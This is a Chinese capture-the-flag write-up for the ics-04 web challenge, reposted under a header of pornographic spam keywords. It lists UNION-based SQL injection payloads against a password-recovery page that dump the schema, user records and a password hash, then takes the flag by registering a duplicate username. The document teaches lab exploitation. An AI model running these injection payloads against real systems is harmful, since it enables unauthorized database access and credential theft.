日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

攻防世界-web-ics-04-从0到1的解题历程writeup

發布時間:2024/9/30 编程问答 29 豆豆
生活随笔 收集整理的這篇文章主要介紹了 攻防世界-web-ics-04-从0到1的解题历程writeup 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

題目分析

題目描述:工控云管理系統新添加的登錄和注冊頁面存在漏洞,請找出flag。

嘗試發現該靶機環境的主要功能為登陸、注冊、找回密碼,題目描述也是很直接,漏洞點就在這。

遇事不決先掃描一下網站有沒有漏洞

發現在findpwd.php中存在sql注入漏洞

嘗試聯合查詢

-1' union select 1,2,3,4--?

-1' union select 1,2,(SELECT GROUP_CONCAT(schema_name) FROM information_schema.schemata),4--?

得到數據庫cetc004

-1' union select 1,2,(SELECT GROUP_CONCAT(TABLE_NAME) FROM information_schema.tables WHERE TABLE_SCHEMA="cetc004" ),4--?

得到表名:user

-1' union select 1,2,(SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name = 'user'),4--?

得到字段:username,password,question,answer

-1' union select 1,2,(SELECT GROUP_CONCAT(username) FROM cetc004.user),4--?

得到username為:c3tlwDmIn23
password:2f8667f381ff50ced6a3edc259260ba9

question:cetc

answer:cdwcewf2e3235y7687jnhbvdfcqsx12324r45y687o98kynbgfvds

可以發現password被MD5加密了(因為我嘗試注冊了一個賬號,發現數據庫中存放的密碼就是md5后的結果)

于是嘗試在找回密碼界面修改c3tlwDmIn23的密碼,發現需要輸入原密碼。明顯findpwd.php也不是我們能攻擊的點。

用自己注冊的賬號進行修改密碼發現會跳轉到reset.php

抓包后也沒有發現什么可攻擊的點。最后神奇的我試了一下注冊相同的用戶名。。。。。居然沒有查重直接注冊了一個用戶名為c3tlwDmIn23的賬號。。。登陸獲得flag

總結

以上是生活随笔為你收集整理的攻防世界-web-ics-04-从0到1的解题历程writeup的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。